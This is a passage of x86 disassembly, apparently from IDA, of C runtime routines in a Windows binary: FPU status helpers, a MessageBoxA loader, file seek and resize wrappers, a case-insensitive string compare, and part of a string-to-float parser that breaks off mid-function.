sub_41D6C3 proc near ; CODE XREF: sub_41CEA6+DE�p
var_4 = word ptr -4
push ecx
fstsw [esp+4+var_4]
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_41D6C3 endp
; =============== S U B R O U T I N E =======================================
sub_41D6D0 proc near ; CODE XREF: sub_41CEA6+1E6�p
var_4 = word ptr -4
push ecx
fnstsw [esp+4+var_4]
fnclex
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_41D6D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6DE proc near ; CODE XREF: sub_419AF8+13�p
; sub_419AF8+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
and ecx, [ebp+arg_4]
not eax
and eax, [ebp+var_4]
or eax, ecx
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41D6DE endp
; =============== S U B R O U T I N E =======================================
sub_41D702 proc near ; CODE XREF: sub_41D14B+20�p
; sub_41D14B+3A�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 4
push ecx
push ecx
mov cl, byte ptr [esp+8+arg_0]
test cl, 1
jz short loc_41D718
fld tbyte_42D2F8
fistp [esp+8+arg_0]
wait
loc_41D718: ; CODE XREF: sub_41D702+9�j
test cl, 8
jz short loc_41D72E
fstsw ax
fld tbyte_42D2F8
fstp [esp+8+var_8]
wait
fstsw ax
loc_41D72E: ; CODE XREF: sub_41D702+19�j
test cl, 10h
jz short loc_41D73E
fld tbyte_42D304
fstp [esp+8+var_8]
wait
loc_41D73E: ; CODE XREF: sub_41D702+2F�j
test cl, 4
jz short loc_41D74C
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_41D74C: ; CODE XREF: sub_41D702+3F�j
test cl, 20h
jz short loc_41D758
fldpi
fstp [esp+8+var_8]
wait
loc_41D758: ; CODE XREF: sub_41D702+4D�j
pop ecx
pop ecx
retn
sub_41D702 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D75B proc near ; CODE XREF: sub_419E4A+132�p
; sub_41C9FD+13A�p
var_10 = byte ptr -10h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_A = byte ptr 12h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp dword_47A1C4, ebx
push esi
push edi
jnz short loc_41D7DB
push offset aUser32_dll ; "user32.dll"
call ds:dword_41F070 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_41D816
mov esi, ds:dword_41F074
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_47A1C4, eax
jz short loc_41D816
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_47A1C8, eax
call esi ; GetProcAddress
cmp dword_479E5C, 2
mov dword_47A1CC, eax
jnz short loc_41D7DB
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_47A1D4, eax
jz short loc_41D7DB
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
mov dword_47A1D0, eax
loc_41D7DB: ; CODE XREF: sub_41D75B+11�j
; sub_41D75B+60�j ...
mov eax, dword_47A1D0
test eax, eax
jz short loc_41D820
call eax ; GetProcessWindowStation
test eax, eax
jz short loc_41D807
lea ecx, [ebp+var_4]
push ecx
push 0Ch
lea ecx, [ebp+var_10]
push ecx
push 1
push eax
call dword_47A1D4 ; GetUserObjectInformationA
test eax, eax
jz short loc_41D807
test [ebp+var_8], 1
jnz short loc_41D820
loc_41D807: ; CODE XREF: sub_41D75B+8D�j
; sub_41D75B+A4�j
cmp dword_479E68, 4
jb short loc_41D81A
or [ebp+arg_A], 20h
jmp short loc_41D83F
; ---------------------------------------------------------------------------
loc_41D816: ; CODE XREF: sub_41D75B+22�j
; sub_41D75B+3D�j
xor eax, eax
jmp short loc_41D84F
; ---------------------------------------------------------------------------
loc_41D81A: ; CODE XREF: sub_41D75B+B3�j
or [ebp+arg_A], 4
jmp short loc_41D83F
; ---------------------------------------------------------------------------
loc_41D820: ; CODE XREF: sub_41D75B+87�j
; sub_41D75B+AA�j
mov eax, dword_47A1C8
test eax, eax
jz short loc_41D83F
call eax ; GetActiveWindow
mov ebx, eax
test ebx, ebx
jz short loc_41D83F
mov eax, dword_47A1CC
test eax, eax
jz short loc_41D83F
push ebx
call eax ; GetLastActivePopup
mov ebx, eax
loc_41D83F: ; CODE XREF: sub_41D75B+B9�j
; sub_41D75B+C3�j ...
push dword ptr [ebp+10h]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_47A1C4 ; MessageBoxA
loc_41D84F: ; CODE XREF: sub_41D75B+BD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D75B endp
; =============== S U B R O U T I N E =======================================
sub_41D854 proc near ; CODE XREF: sub_41D885+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_47A401[eax], cl
jnz short loc_41D881
cmp [esp+arg_4], 0
jz short loc_41D87A
movzx eax, ds:word_427AB2[eax*2]
and eax, [esp+arg_4]
jmp short loc_41D87C
; ---------------------------------------------------------------------------
loc_41D87A: ; CODE XREF: sub_41D854+16�j
xor eax, eax
loc_41D87C: ; CODE XREF: sub_41D854+24�j
test eax, eax
jnz short loc_41D881
retn
; ---------------------------------------------------------------------------
loc_41D881: ; CODE XREF: sub_41D854+F�j
; sub_41D854+2A�j
xor eax, eax
inc eax
retn
sub_41D854 endp
; =============== S U B R O U T I N E =======================================
sub_41D885 proc near ; CODE XREF: sub_41A15E+35�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_41D854
add esp, 0Ch
retn
sub_41D885 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D896 proc near ; CODE XREF: sub_41A7BC+54�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_41B76B
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_41D8C7
call sub_417C70
mov dword ptr [eax], 9
jmp short loc_41D8F0
; ---------------------------------------------------------------------------
loc_41D8C7: ; CODE XREF: sub_41D896+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call ds:dword_41F05C ; SetFilePointer
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_41D8F6
call ds:dword_41F008 ; RtlGetLastWin32Error
test eax, eax
jz short loc_41D8F6
push eax
call sub_417C82
pop ecx
loc_41D8F0: ; CODE XREF: sub_41D896+2F�j
mov eax, edi
mov edx, edi
jmp short loc_41D915
; ---------------------------------------------------------------------------
loc_41D8F6: ; CODE XREF: sub_41D896+47�j
; sub_41D896+51�j
mov eax, esi
sar eax, 5
mov eax, dword_47A2E0[eax*4]
and esi, 1Fh
lea ecx, [esi+esi*8]
lea eax, [eax+ecx*4+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_41D915: ; CODE XREF: sub_41D896+5E�j
pop edi
pop esi
leave
retn
sub_41D896 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
mov al, 0FFh
mov edi, edi
loc_41D930: ; CODE XREF: .text:0041D940�j
; .text:0041D960�j
or al, al
jz short loc_41D966
mov al, [esi]
add esi, 1
mov ah, [edi]
add edi, 1
cmp ah, al
jz short loc_41D930
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_41D930
sbb al, al
sbb al, 0FFh
loc_41D966: ; CODE XREF: .text:0041D932�j
movsx eax, al
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D96E proc near ; CODE XREF: sub_41BFAD+2BD�p
var_100C = byte ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_412DD0
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
push esi
push 1
xor esi, esi
push esi
push [ebp+arg_0]
mov [ebp+var_4], eax
call sub_419BC9
or ebx, 0FFFFFFFFh
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_41DA98
push 2
push esi
push [ebp+arg_0]
call sub_419BC9
add esp, 0Ch
cmp eax, ebx
jz loc_41DA98
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_41DA3B
mov ebx, 1000h
push ebx
lea eax, [ebp+var_100C]
push esi
push eax
call sub_41ADD0
push 8000h
push [ebp+arg_0]
call sub_41E541
add esp, 14h
mov [ebp+var_C], eax
loc_41D9EC: ; CODE XREF: sub_41D96E+A2�j
cmp edi, ebx
mov eax, ebx
jge short loc_41D9F4
mov eax, edi
loc_41D9F4: ; CODE XREF: sub_41D96E+82�j
push eax
lea eax, [ebp+var_100C]
push eax
push [ebp+arg_0]
call sub_41A7BC
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_41DA14
sub edi, eax
test edi, edi
jg short loc_41D9EC
jmp short loc_41DA2C
; ---------------------------------------------------------------------------
loc_41DA14: ; CODE XREF: sub_41D96E+9C�j
call sub_417C79
cmp dword ptr [eax], 5
jnz short loc_41DA29
call sub_417C70
mov dword ptr [eax], 0Dh
loc_41DA29: ; CODE XREF: sub_41D96E+AE�j
or esi, 0FFFFFFFFh
loc_41DA2C: ; CODE XREF: sub_41D96E+A4�j
push [ebp+var_C]
push [ebp+arg_0]
call sub_41E541
pop ecx
pop ecx
jmp short loc_41DA83
; ---------------------------------------------------------------------------
loc_41DA3B: ; CODE XREF: sub_41D96E+56�j
jge short loc_41DA83
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419BC9
push [ebp+arg_0]
call sub_41B76B
add esp, 10h
push eax
call ds:dword_41F10C ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, ebx
jnz short loc_41DA83
call sub_417C70
mov dword ptr [eax], 0Dh
call sub_417C79
mov edi, eax
call ds:dword_41F008 ; RtlGetLastWin32Error
mov [edi], eax
loc_41DA83: ; CODE XREF: sub_41D96E+CB�j
; sub_41D96E:loc_41DA3B�j ...
push 0
push [ebp+var_8]
push [ebp+arg_0]
call sub_419BC9
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_41DA9A
; ---------------------------------------------------------------------------
loc_41DA98: ; CODE XREF: sub_41D96E+32�j
; sub_41D96E+48�j
mov eax, ebx
loc_41DA9A: ; CODE XREF: sub_41D96E+128�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
pop ebx
call sub_4182D6
leave
retn
sub_41D96E endp
; =============== S U B R O U T I N E =======================================
sub_41DAA9 proc near ; CODE XREF: sub_41C31B+23�p
; sub_41C31B+3A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
lea ecx, [edx+esi]
xor eax, eax
cmp ecx, edx
jb short loc_41DABF
cmp ecx, esi
jnb short loc_41DAC2
loc_41DABF: ; CODE XREF: sub_41DAA9+10�j
xor eax, eax
inc eax
loc_41DAC2: ; CODE XREF: sub_41DAA9+14�j
mov edx, [esp+4+arg_8]
mov [edx], ecx
pop esi
retn
sub_41DAA9 endp
; =============== S U B R O U T I N E =======================================
sub_41DACA proc near ; CODE XREF: sub_41DB83+4B�p
; sub_41DB83+6C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_41DAA9
add esp, 0Ch
test eax, eax
jz short loc_41DAFC
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_41DAA9
add esp, 0Ch
test eax, eax
jz short loc_41DAFC
inc dword ptr [esi+8]
loc_41DAFC: ; CODE XREF: sub_41DACA+19�j
; sub_41DACA+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_41DAA9
add esp, 0Ch
test eax, eax
jz short loc_41DB14
inc dword ptr [esi+8]
loc_41DB14: ; CODE XREF: sub_41DACA+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_41DAA9
add esp, 0Ch
pop edi
pop esi
retn
sub_41DACA endp
; =============== S U B R O U T I N E =======================================
sub_41DB28 proc near ; CODE XREF: sub_41DB83+3B�p
; sub_41DB83+41�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, [eax]
mov ecx, esi
add esi, esi
push edi
mov edi, [eax+4]
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+4], esi
mov [eax+8], ecx
pop esi
retn
sub_41DB28 endp
; =============== S U B R O U T I N E =======================================
sub_41DB56 proc near ; CODE XREF: sub_41E0A1+1C1�p
; sub_41E5A3+18A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov edx, [eax+8]
mov ecx, [eax+4]
push esi
push edi
mov edi, ecx
mov esi, edx
shr ecx, 1
shl esi, 1Fh
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
or ecx, edi
shr edx, 1
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_41DB56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DB83 proc near ; CODE XREF: sub_41DC67+362�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
cmp eax, edx
push esi
push edi
mov [ebp+var_8], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_41DC01
mov [ebp+arg_8], eax
loc_41DBB5: ; CODE XREF: sub_41DB83+7A�j
mov esi, ebx
lea edi, [ebp+var_14]
movsd
movsd
push ebx
movsd
call sub_41DB28
push ebx
call sub_41DB28
lea eax, [ebp+var_14]
push eax
push ebx
call sub_41DACA
push ebx
call sub_41DB28
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ebx
call sub_41DACA
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_41DBB5
xor edx, edx
loc_41DC01: ; CODE XREF: sub_41DB83+2D�j
cmp [ebx+8], edx
jnz short loc_41DC35
mov edi, [ebx+8]
loc_41DC09: ; CODE XREF: sub_41DB83+AD�j
mov ecx, [ebx+4]
add [ebp+var_8], 0FFF0h
mov eax, ecx
shr eax, 10h
mov edi, eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
cmp edi, edx
mov [ebx+4], esi
mov [ebx], eax
jz short loc_41DC09
mov [ebx+8], edi
loc_41DC35: ; CODE XREF: sub_41DB83+81�j
mov esi, 8000h
jmp short loc_41DC4A
; ---------------------------------------------------------------------------
loc_41DC3C: ; CODE XREF: sub_41DB83+CA�j
push ebx
call sub_41DB28
add [ebp+var_8], 0FFFFh
pop ecx
loc_41DC4A: ; CODE XREF: sub_41DB83+B7�j
test [ebx+8], esi
jz short loc_41DC3C
mov ecx, [ebp+var_4]
mov ax, word ptr [ebp+var_8]
xor ecx, [ebp+4]
pop edi
pop esi
mov [ebx+0Ah], ax
pop ebx
call sub_4182D6
leave
retn
sub_41DB83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC67 proc near ; CODE XREF: sub_41C60D+22�p
; sub_41C650+22�p
var_58 = byte ptr -58h
var_41 = byte ptr -41h
var_3C = dword ptr -3Ch
var_36 = dword ptr -36h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
xor eax, eax
push edi
mov edi, [ebp+arg_8]
lea esi, [ebp+var_58]
mov [ebp+var_8], esi
mov [ebp+var_2C], eax
mov [ebp+var_1C], 1
mov [ebp+var_C], eax
mov [ebp+var_14], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_10], eax
mov [ebp+var_18], eax
mov [ebp+arg_8], edi
loc_41DCA8: ; CODE XREF: sub_41DC67+58�j
mov cl, [edi]
cmp cl, 20h
jz short loc_41DCBE
cmp cl, 9
jz short loc_41DCBE
cmp cl, 0Ah
jz short loc_41DCBE
cmp cl, 0Dh
jnz short loc_41DCC1
loc_41DCBE: ; CODE XREF: sub_41DC67+46�j
; sub_41DC67+4B�j ...
inc edi
jmp short loc_41DCA8
; ---------------------------------------------------------------------------
loc_41DCC1: ; CODE XREF: sub_41DC67+55�j
; sub_41DC67+B5�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_41DF40 ; default
; jumptable 0041DCCD case 10
jmp ds:off_41E071[eax*4] ; switch jump
loc_41DCD4: ; DATA XREF: .text:off_41E071�o
cmp bl, 31h ; jumptable 0041DCCD case 0
jl short loc_41DCE5
cmp bl, 39h
jg short loc_41DCE5
loc_41DCDE: ; CODE XREF: sub_41DC67+CE�j
; sub_41DC67+129�j
push 3
jmp loc_41DEFF
; ---------------------------------------------------------------------------
loc_41DCE5: ; CODE XREF: sub_41DC67+70�j
; sub_41DC67+75�j
cmp bl, byte_42D090
jnz short loc_41DCF4
loc_41DCED: ; CODE XREF: sub_41DC67+135�j
push 5
jmp loc_41DF36
; ---------------------------------------------------------------------------
loc_41DCF4: ; CODE XREF: sub_41DC67+84�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41DD1E
dec eax
dec eax
jz short loc_41DD12
sub eax, 3
jz loc_41DDAB
mov [ebp+var_8], esi
dec edi
jmp loc_41DEBD
; ---------------------------------------------------------------------------
loc_41DD12: ; CODE XREF: sub_41DC67+97�j
push 2
pop eax
mov [ebp+var_2C], 8000h
jmp short loc_41DCC1
; ---------------------------------------------------------------------------
loc_41DD1E: ; CODE XREF: sub_41DC67+93�j
and [ebp+var_2C], 0
push 2
pop eax
jmp short loc_41DCC1
; ---------------------------------------------------------------------------
loc_41DD27: ; CODE XREF: sub_41DC67+66�j
; DATA XREF: .text:off_41E071�o
xor eax, eax ; jumptable 0041DCCD case 1
inc eax
cmp bl, 31h
mov [ebp+var_14], eax
jl short loc_41DD37
cmp bl, 39h
jle short loc_41DCDE
loc_41DD37: ; CODE XREF: sub_41DC67+C9�j
cmp bl, byte_42D090
jnz short loc_41DD46
loc_41DD3F: ; CODE XREF: sub_41DC67+182�j
push 4
jmp loc_41DF36
; ---------------------------------------------------------------------------
loc_41DD46: ; CODE XREF: sub_41DC67+D6�j
cmp bl, 2Bh
jz short loc_41DD80
cmp bl, 2Dh
jz short loc_41DD80
cmp bl, 30h
jz loc_41DCC1
loc_41DD59: ; CODE XREF: sub_41DC67+1DA�j
cmp bl, 43h
jle loc_41DEB9
cmp bl, 45h
jle short loc_41DD79
cmp bl, 63h
jle loc_41DEB9
cmp bl, 65h
jg loc_41DEB9
loc_41DD79: ; CODE XREF: sub_41DC67+FE�j
push 6
jmp loc_41DF36
; ---------------------------------------------------------------------------
loc_41DD80: ; CODE XREF: sub_41DC67+E2�j
; sub_41DC67+E7�j ...
dec edi
push 0Bh
jmp loc_41DF36
; ---------------------------------------------------------------------------
loc_41DD88: ; CODE XREF: sub_41DC67+66�j
; DATA XREF: .text:off_41E071�o
cmp bl, 31h ; jumptable 0041DCCD case 2
jl short loc_41DD96
cmp bl, 39h
jle loc_41DCDE
loc_41DD96: ; CODE XREF: sub_41DC67+124�j
cmp bl, byte_42D090
jz loc_41DCED
cmp bl, 30h
jnz loc_41DF0B
loc_41DDAB: ; CODE XREF: sub_41DC67+9C�j
xor eax, eax
inc eax
jmp loc_41DCC1
; ---------------------------------------------------------------------------
loc_41DDB3: ; CODE XREF: sub_41DC67+66�j
; DATA XREF: .text:off_41E071�o
mov [ebp+var_14], 1 ; jumptable 0041DCCD case 3
jmp short loc_41DDD3
; ---------------------------------------------------------------------------
loc_41DDBC: ; CODE XREF: sub_41DC67+178�j
cmp [ebp+var_C], 19h
jnb short loc_41DDCD
inc [ebp+var_C]
sub bl, 30h
mov [esi], bl
inc esi
jmp short loc_41DDD0
; ---------------------------------------------------------------------------
loc_41DDCD: ; CODE XREF: sub_41DC67+159�j
inc [ebp+var_10]
loc_41DDD0: ; CODE XREF: sub_41DC67+164�j
mov bl, [edi]
inc edi
loc_41DDD3: ; CODE XREF: sub_41DC67+153�j
movzx eax, bl
push eax
call sub_41ABBC
test eax, eax
pop ecx
jnz short loc_41DDBC
cmp bl, byte_42D090
jnz short loc_41DE2F
jmp loc_41DD3F
; ---------------------------------------------------------------------------
loc_41DDEE: ; CODE XREF: sub_41DC67+66�j
; DATA XREF: .text:off_41E071�o
xor eax, eax ; jumptable 0041DCCD case 4
inc eax
cmp [ebp+var_C], 0
mov [ebp+var_14], eax
mov [ebp+var_28], eax
jnz short loc_41DE21
jmp short loc_41DE05
; ---------------------------------------------------------------------------
loc_41DDFF: ; CODE XREF: sub_41DC67+1A1�j
dec [ebp+var_10]
mov bl, [edi]
inc edi
loc_41DE05: ; CODE XREF: sub_41DC67+196�j
cmp bl, 30h
jz short loc_41DDFF
jmp short loc_41DE21
; ---------------------------------------------------------------------------
loc_41DE0C: ; CODE XREF: sub_41DC67+1C6�j
cmp [ebp+var_C], 19h
jnb short loc_41DE1E
inc [ebp+var_C]
sub bl, 30h
mov [esi], bl
inc esi
dec [ebp+var_10]
loc_41DE1E: ; CODE XREF: sub_41DC67+1A9�j
mov bl, [edi]
inc edi
loc_41DE21: ; CODE XREF: sub_41DC67+194�j
; sub_41DC67+1A3�j
movzx eax, bl
push eax
call sub_41ABBC
test eax, eax
pop ecx
jnz short loc_41DE0C
loc_41DE2F: ; CODE XREF: sub_41DC67+180�j
cmp bl, 2Bh
jz loc_41DD80
cmp bl, 2Dh
jz loc_41DD80
jmp loc_41DD59
; ---------------------------------------------------------------------------
loc_41DE46: ; CODE XREF: sub_41DC67+66�j
; DATA XREF: .text:off_41E071�o
movzx eax, bl ; jumptable 0041DCCD case 5
push eax
mov [ebp+var_28], 1
call sub_41ABBC
test eax, eax
pop ecx
jz loc_41DF0B
push 4
jmp loc_41DEFF
; ---------------------------------------------------------------------------
loc_41DE66: ; CODE XREF: sub_41DC67+66�j
; DATA XREF: .text:off_41E071�o
cmp bl, 31h ; jumptable 0041DCCD case 6
lea ecx, [edi-2]
mov [ebp+arg_8], ecx
jl short loc_41DE7A
cmp bl, 39h
jle loc_41DEFD
loc_41DE7A: ; CODE XREF: sub_41DC67+208�j
movsx eax, bl
sub eax, 2Bh
jz loc_41DF34
dec eax
dec eax
jz loc_41DF28
sub eax, 3
jnz loc_41DF4E
loc_41DE97: ; CODE XREF: sub_41DC67+2A2�j
push 8
jmp loc_41DF36
; ---------------------------------------------------------------------------
loc_41DE9E: ; CODE XREF: sub_41DC67+66�j
; DATA XREF: .text:off_41E071�o
mov [ebp+var_24], 1 ; jumptable 0041DCCD case 8
jmp short loc_41DEAA
; ---------------------------------------------------------------------------
loc_41DEA7: ; CODE XREF: sub_41DC67+246�j
mov bl, [edi]
inc edi
loc_41DEAA: ; CODE XREF: sub_41DC67+23E�j
cmp bl, 30h
jz short loc_41DEA7
cmp bl, 31h
jl short loc_41DEB9
cmp bl, 39h
jle short loc_41DEFD
loc_41DEB9: ; CODE XREF: sub_41DC67+F5�j
; sub_41DC67+103�j ...
dec edi
loc_41DEBA: ; CODE XREF: sub_41DC67+2A7�j
; sub_41DC67+2E2�j
mov [ebp+var_8], esi
loc_41DEBD: ; CODE XREF: sub_41DC67+A6�j
; sub_41DC67+2EC�j ...
cmp [ebp+var_14], 0
mov eax, [ebp+arg_4]
mov [eax], edi
jz loc_41E01C
push 18h
pop eax
cmp [ebp+var_C], eax
jbe short loc_41DEE4
cmp [ebp+var_41], 5
jl short loc_41DEDD
inc [ebp+var_41]
loc_41DEDD: ; CODE XREF: sub_41DC67+271�j
dec esi
inc [ebp+var_10]
mov [ebp+var_C], eax
loc_41DEE4: ; CODE XREF: sub_41DC67+26B�j
cmp [ebp+var_C], 0
jbe loc_41E043
jmp loc_41DFB8
; ---------------------------------------------------------------------------
loc_41DEF3: ; CODE XREF: sub_41DC67+66�j
; DATA XREF: .text:off_41E071�o
cmp bl, 31h ; jumptable 0041DCCD case 7
jl short loc_41DF06
cmp bl, 39h
jg short loc_41DF06
loc_41DEFD: ; CODE XREF: sub_41DC67+20D�j
; sub_41DC67+250�j
push 9
loc_41DEFF: ; CODE XREF: sub_41DC67+79�j
; sub_41DC67+1FA�j
pop eax
dec edi
jmp loc_41DCC1
; ---------------------------------------------------------------------------
loc_41DF06: ; CODE XREF: sub_41DC67+28F�j
; sub_41DC67+294�j
cmp bl, 30h
jz short loc_41DE97
loc_41DF0B: ; CODE XREF: sub_41DC67+13E�j
; sub_41DC67+1F2�j
mov edi, [ebp+arg_8]
jmp short loc_41DEBA
; ---------------------------------------------------------------------------
loc_41DF10: ; CODE XREF: sub_41DC67+66�j
; DATA XREF: .text:off_41E071�o
cmp [ebp+arg_18], 0 ; jumptable 0041DCCD case 11
jz short loc_41DF3C
movsx eax, bl
sub eax, 2Bh
lea ecx, [edi-1]
mov [ebp+arg_8], ecx
jz short loc_41DF34
dec eax
dec eax
jnz short loc_41DF4E
loc_41DF28: ; CODE XREF: sub_41DC67+221�j
or [ebp+var_1C], 0FFFFFFFFh
push 7
pop eax
jmp loc_41DCC1
; ---------------------------------------------------------------------------
loc_41DF34: ; CODE XREF: sub_41DC67+219�j
; sub_41DC67+2BB�j
push 7
loc_41DF36: ; CODE XREF: sub_41DC67+88�j
; sub_41DC67+DA�j ...
pop eax
jmp loc_41DCC1
; ---------------------------------------------------------------------------
loc_41DF3C: ; CODE XREF: sub_41DC67+2AD�j
push 0Ah
pop eax
dec edi
loc_41DF40: ; CODE XREF: sub_41DC67+60�j
; sub_41DC67+66�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 0041DCCD case 10
jnz loc_41DCC1
jmp loc_41DEBA
; ---------------------------------------------------------------------------
loc_41DF4E: ; CODE XREF: sub_41DC67+22A�j
; sub_41DC67+2BF�j
mov [ebp+var_8], esi
mov edi, ecx
jmp loc_41DEBD
; ---------------------------------------------------------------------------
loc_41DF58: ; CODE XREF: sub_41DC67+66�j
; DATA XREF: .text:off_41E071�o
mov [ebp+var_8], esi ; jumptable 0041DCCD case 9
mov [ebp+var_24], 1
xor esi, esi
jmp short loc_41DF7B
; ---------------------------------------------------------------------------
loc_41DF66: ; CODE XREF: sub_41DC67+320�j
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_41DF8B
mov bl, [edi]
inc edi
loc_41DF7B: ; CODE XREF: sub_41DC67+2FD�j
movzx eax, bl
push eax
call sub_41ABBC
test eax, eax
pop ecx
jnz short loc_41DF66
jmp short loc_41DF90
; ---------------------------------------------------------------------------
loc_41DF8B: ; CODE XREF: sub_41DC67+30F�j
mov esi, 1451h
loc_41DF90: ; CODE XREF: sub_41DC67+322�j
mov [ebp+var_20], esi
movzx eax, bl
jmp short loc_41DF9E
; ---------------------------------------------------------------------------
loc_41DF98: ; CODE XREF: sub_41DC67+340�j
mov al, [edi]
inc edi
movzx eax, al
loc_41DF9E: ; CODE XREF: sub_41DC67+32F�j
push eax
call sub_41ABBC
test eax, eax
pop ecx
jnz short loc_41DF98
